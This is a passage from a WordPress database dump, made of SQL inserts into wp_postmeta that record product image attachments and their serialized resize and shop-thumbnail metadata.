INSERT INTO `wp_postmeta` VALUES (17578, 1753, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:19:"2016/09/MS-467C.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:19:"MS-467C-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:19:"MS-467C-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:19:"MS-467C-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:21:"MS-467C-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:19:"MS-467C-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:19:"MS-467C-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:19:"MS-467C-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:19:"MS-467C-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"4";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (17579, 1754, '_wp_attached_file', '2016/09/MS-470C.jpg'); 
INSERT INTO `wp_postmeta` VALUES (17580, 1754, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:19:"2016/09/MS-470C.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:19:"MS-470C-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:19:"MS-470C-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:19:"MS-470C-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:21:"MS-470C-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:19:"MS-470C-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:19:"MS-470C-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:19:"MS-470C-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:19:"MS-470C-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"5";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (17581, 1755, '_wp_attached_file', '2016/09/MS-470S.jpg'); 
INSERT INTO `wp_postmeta` VALUES (17582, 1755, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:19:"2016/09/MS-470S.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:19:"MS-470S-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:19:"MS-470S-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:19:"MS-470S-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:21:"MS-470S-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:19:"MS-470S-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:19:"MS-470S-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:19:"MS-470S-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:19:"MS-470S-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"5";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (17583, 1756, '_wp_attached_file', '2016/09/MS-472C.jpg'); 
INSERT INTO `wp_postmeta` VALUES (17584, 1756, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:19:"2016/09/MS-472C.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:19:"MS-472C-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:19:"MS-472C-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:19:"MS-472C-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:21:"MS-472C-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:19:"MS-472C-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:19:"MS-472C-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:19:"MS-472C-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:19:"MS-472C-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"4";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (17585, 1757, '_wp_attached_file', '2016/09/MS-472S.jpg'); 
INSERT INTO `wp_postmeta` VALUES (17586, 1757, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:19:"2016/09/MS-472S.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:19:"MS-472S-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:19:"MS-472S-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:19:"MS-472S-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:21:"MS-472S-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:19:"MS-472S-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:19:"MS-472S-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:19:"MS-472S-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:19:"MS-472S-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"5";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (17587, 623, '_thumbnail_id', '1732'); 
INSERT INTO `wp_postmeta` VALUES (17588, 623, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (17589, 1758, '_wp_attached_file', '2016/09/MS-475C.jpg'); 
INSERT INTO `wp_postmeta` VALUES (17590, 1758, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:19:"2016/09/MS-475C.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:19:"MS-475C-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:19:"MS-475C-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:19:"MS-475C-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:21:"MS-475C-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:19:"MS-475C-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:19:"MS-475C-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:19:"MS-475C-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:19:"MS-475C-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"5";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (17591, 1759, '_wp_attached_file', '2016/09/MS-477C.jpg'); 
INSERT INTO `wp_postmeta` VALUES (17592, 1759, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:19:"2016/09/MS-477C.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:19:"MS-477C-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:19:"MS-477C-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:19:"MS-477C-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:21:"MS-477C-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:19:"MS-477C-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:19:"MS-477C-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:19:"MS-477C-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:19:"MS-477C-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"5";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (17593, 1760, '_wp_attached_file', '2016/09/MS-530N.jpg'); 
INSERT INTO `wp_postmeta` VALUES (17594, 1760, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:19:"2016/09/MS-530N.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:19:"MS-530N-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:19:"MS-530N-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:19:"MS-530N-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:21:"MS-530N-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:19:"MS-530N-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:19:"MS-530N-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:19:"MS-530N-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:19:"MS-530N-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"3";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (17595, 1761, '_wp_attached_file', '2016/09/MS-550N.jpg'); 
INSERT INTO `wp_postmeta` VALUES (17596, 1761, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:19:"2016/09/MS-550N.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:19:"MS-550N-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:19:"MS-550N-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:19:"MS-550N-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:21:"MS-550N-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:19:"MS-550N-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:19:"MS-550N-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:19:"MS-550N-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:19:"MS-550N-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"3";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (17597, 1762, '_wp_attached_file', '2016/09/MS-555-2.jpg'); 
INSERT INTO `wp_postmeta` VALUES (17598, 1762, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:20:"2016/09/MS-555-2.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:20:"MS-555-2-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:20:"MS-555-2-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:20:"MS-555-2-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:22:"MS-555-2-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:20:"MS-555-2-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:20:"MS-555-2-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:20:"MS-555-2-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:20:"MS-555-2-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"4";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (17599, 1763, '_wp_attached_file', '2016/09/MS-555.jpg'); 
INSERT INTO `wp_postmeta` VALUES (17600, 1763, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:18:"2016/09/MS-555.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:18:"MS-555-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:18:"MS-555-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:18:"MS-555-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:20:"MS-555-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:18:"MS-555-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:18:"MS-555-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:18:"MS-555-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:18:"MS-555-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"5";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (17601, 1764, '_wp_attached_file', '2016/09/MS-560.jpg'); 
INSERT INTO `wp_postmeta` VALUES (17602, 1764, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:18:"2016/09/MS-560.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:18:"MS-560-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:18:"MS-560-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:18:"MS-560-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:20:"MS-560-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:18:"MS-560-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:18:"MS-560-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:18:"MS-560-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:18:"MS-560-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"5";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (17603, 1765, '_wp_attached_file', '2016/09/MS-580N.jpg'); 
INSERT INTO `wp_postmeta` VALUES (17604, 1765, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:19:"2016/09/MS-580N.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:19:"MS-580N-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:19:"MS-580N-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:19:"MS-580N-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:21:"MS-580N-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:19:"MS-580N-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:19:"MS-580N-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:19:"MS-580N-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:19:"MS-580N-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"5";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (17605, 1766, '_wp_attached_file', '2016/09/MS-720.jpg'); 
